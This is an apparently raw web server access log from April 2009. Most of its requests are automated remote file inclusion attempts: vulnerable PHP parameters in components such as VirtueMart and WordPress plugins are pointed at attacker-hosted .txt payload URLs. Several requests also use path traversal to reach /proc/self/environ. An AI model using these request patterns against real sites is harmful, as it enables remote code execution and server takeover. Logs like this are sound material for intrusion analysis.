91.121.176.170 - - [27/Apr/2009:16:20:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://zuo.w8w.pl/hm.txt?? HTTP/1.1" 200 187156 "-""libwww-perl/5.813"
91.121.176.170 - - [27/Apr/2009:16:20:19 -0500] "GET //?path%5Bdocroot%5D=http://zuo.w8w.pl/hm.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.813"
125.251.133.3 - - [27/Apr/2009:16:21:38 -0500] "GET /logs/access_log.1239667200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
125.251.133.3 - - [27/Apr/2009:16:22:15 -0500] "GET /logs/access_log.1239667200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
118.220.255.156 - - [27/Apr/2009:16:23:01 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.220.255.156 - - [27/Apr/2009:16:23:01 -0500] "GET //errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.220.255.156 - - [27/Apr/2009:16:23:01 -0500] "GET /logs//errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.220.255.156 - - [27/Apr/2009:16:23:08 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:24:21 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:24:21 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:24:21 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.147.29.190 - - [27/Apr/2009:16:24:41 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.147.29.190 - - [27/Apr/2009:16:24:41 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.147.29.190 - - [27/Apr/2009:16:24:41 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:24:56 -0500] "GET /logs/access_log.1235088000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:26:41 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:26:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:26:41 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:27:58 -0500] "GET /logs/access_log.1235088000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:36:13 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:36:13 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:36:13 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:36:22 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:36:22 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:36:25 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:37:21 -0500] "GET /logs/access_log.1235088000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
61.96.111.133 - - [27/Apr/2009:16:37:24 -0500] "GET /logs/access_log.1235088000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
66.249.71.203 - - [27/Apr/2009:16:39:02 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.203 - - [27/Apr/2009:16:39:02 -0500] "GET /logs/access_log.1212451200 HTTP/1.1" 200 1541 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.18.242 - - [27/Apr/2009:16:39:29 -0500] "GET /db.php?path_local=http://www.dekcom.info/idxx.txt? HTTP/1.1" 404 289 "-""Mozilla/5.0"
211.189.18.242 - - [27/Apr/2009:16:39:29 -0500] "GET /logs/db.php?path_local=http://www.dekcom.info/idxx.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.189.18.242 - - [27/Apr/2009:16:39:29 -0500] "GET /logs/access_log.1239667200/db.php?path_local=http://www.dekcom.info/idxx.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.189.18.242 - - [27/Apr/2009:16:39:29 -0500] "GET /logs/access_log.1239753600/db.php?path_local=http://www.dekcom.info/idxx.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:43:56 -0500] "GET /logs/access_log.1239408000/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:43:56 -0500] "GET /logs/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:43:56 -0500] "GET /administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:47:08 -0500] "GET /logs/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:47:08 -0500] "GET /administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:47:08 -0500] "GET /logs/access_log.1239408000/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
77.222.40.234 - - [27/Apr/2009:16:49:08 -0500] "GET /logs//admin/classes/errors.php?error=http://zuo.w8w.pl/hm.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.222.40.234 - - [27/Apr/2009:16:49:09 -0500] "GET //admin/classes/errors.php?error=http://zuo.w8w.pl/hm.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
210.97.227.143 - - [27/Apr/2009:16:49:20 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.new-image.fr/b1ttletX.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
210.97.227.143 - - [27/Apr/2009:16:49:20 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.new-image.fr/b1ttletX.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
209.90.91.245 - - [27/Apr/2009:16:49:28 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.new-image.fr/bi1tXl334t.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
209.90.91.245 - - [27/Apr/2009:16:49:28 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.new-image.fr/bi1tXl334t.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
218.150.79.146 - - [27/Apr/2009:16:50:10 -0500] "GET /logs/access_log.1239408000/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:50:10 -0500] "GET /administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:16:50:10 -0500] "GET /logs/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.75.255.125 - - [27/Apr/2009:16:50:41 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:16:50:41 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:16:50:45 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:16:50:45 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
64.118.90.253 - - [27/Apr/2009:16:51:02 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.new-image.fr/bi1tXl334t.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.118.90.253 - - [27/Apr/2009:16:51:02 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.new-image.fr/bi1tXl334t.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.75.19.34 - - [27/Apr/2009:16:51:45 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://alinutzul.ucoz.ru/idnou.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.75.19.34 - - [27/Apr/2009:16:51:45 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://alinutzul.ucoz.ru/idnou.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.25.57.108 - - [27/Apr/2009:16:52:25 -0500] "GET //citywriter/head.php?path=http://alinutzul.ucoz.ru/idnou.txt??? HTTP/1.1" 404 303 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
81.25.57.108 - - [27/Apr/2009:16:52:25 -0500] "GET /logs//citywriter/head.php?path=http://alinutzul.ucoz.ru/idnou.txt??? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
62.75.255.125 - - [27/Apr/2009:16:52:32 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:16:52:32 -0500] "GET //include/admin.lib.inc.php?site_path=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:16:52:45 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.825"
62.75.255.125 - - [27/Apr/2009:16:52:45 -0500] "GET //include/admin.lib.inc.php?site_path=http://netcoreinvestments.com/idste.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
77.222.131.35 - - [27/Apr/2009:16:56:02 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.222.131.35 - - [27/Apr/2009:16:56:04 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.radioaktivnost.si/ewsmambo/fx29id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.90.214.218 - - [27/Apr/2009:16:59:09 -0500] "GET /index.php?option=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 292 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.90.214.218 - - [27/Apr/2009:16:59:10 -0500] "GET /logs/index.php?option=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 297 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.90.214.218 - - [27/Apr/2009:16:59:10 -0500] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.90.214.218 - - [27/Apr/2009:16:59:10 -0500] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
81.90.214.218 - - [27/Apr/2009:16:59:10 -0500] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-""XXXXXX"
81.90.214.218 - - [27/Apr/2009:16:59:10 -0500] "GET /logs/index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297 "-""XXXXXX"
81.90.214.218 - - [27/Apr/2009:16:59:11 -0500] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""XXXXXX"
81.90.214.218 - - [27/Apr/2009:16:59:11 -0500] "GET /logs/index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""XXXXXX"
174.133.83.130 - - [27/Apr/2009:16:59:39 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:16:59:39 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:16:59:39 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:16:59:42 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:16:59:42 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:16:59:42 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:16:59:59 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:16:59:59 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:16:59:59 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.22.204.193 - - [27/Apr/2009:17:04:54 -0500] "GET /logs/index.php?configFile=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.76"
203.22.204.193 - - [27/Apr/2009:17:04:54 -0500] "GET /index.php?configFile=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.76"
77.221.130.15 - - [27/Apr/2009:17:05:54 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://garnet.at.ua/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.221.130.15 - - [27/Apr/2009:17:05:54 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://garnet.at.ua/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.15 - - [27/Apr/2009:17:05:54 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://garnet.at.ua/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:06:51 -0500] "GET /logs/access_log.1239235200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:17:07:01 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:17:07:01 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:17:07:01 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:07:33 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:07:33 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:07:33 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:17:14:16 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
203.97.95.186 - - [27/Apr/2009:17:14:20 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
210.97.227.143 - - [27/Apr/2009:17:20:24 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.new-image.fr/b1ttletX.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
210.97.227.143 - - [27/Apr/2009:17:20:25 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.new-image.fr/b1ttletX.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
68.171.54.5 - - [27/Apr/2009:17:25:04 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.landran.ca/image/sistem.gif??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
68.171.54.5 - - [27/Apr/2009:17:25:04 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.landran.ca/image/sistem.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
121.165.73.157 - - [27/Apr/2009:17:27:17 -0500] "GET /scanhttp://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Apr/2009:17:27:17 -0500] "GET /logs/scanhttp://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
212.9.224.154 - - [27/Apr/2009:17:28:00 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.importacionesenergia.com/administrator/log.txt?? HTTP/1.1" 200 187156 "-""libwww-perl/5.803"
212.9.224.154 - - [27/Apr/2009:17:28:00 -0500] "GET //?_PHPLIB[libdir]=http://www.importacionesenergia.com/administrator/log.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
218.150.79.146 - - [27/Apr/2009:17:31:27 -0500] "GET /administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:17:31:27 -0500] "GET /logs/access_log.1239408000/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:17:31:27 -0500] "GET /logs/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:17:32:46 -0500] "GET /logs/access_log.1239408000/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:17:32:46 -0500] "GET /administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.150.79.146 - - [27/Apr/2009:17:32:46 -0500] "GET /logs/administrator/components/com_virtuemart/classes/ps_main.php?mosConfig_absolute_path=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.64.34.249 - - [27/Apr/2009:17:34:42 -0500] "GET /logs/scanhttp://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
69.64.34.249 - - [27/Apr/2009:17:34:42 -0500] "GET /scanhttp://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
174.133.83.130 - - [27/Apr/2009:17:35:20 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:17:35:20 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:17:35:20 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:35:29 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:35:29 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:35:29 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
174.133.83.130 - - [27/Apr/2009:17:35:31 -0500] "GET /logs/access_log.1239148800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.54.239.74 - - [27/Apr/2009:17:35:40 -0500] "GET /logs/access_log.1239148800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.69.106.77 - - [27/Apr/2009:17:36:05 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
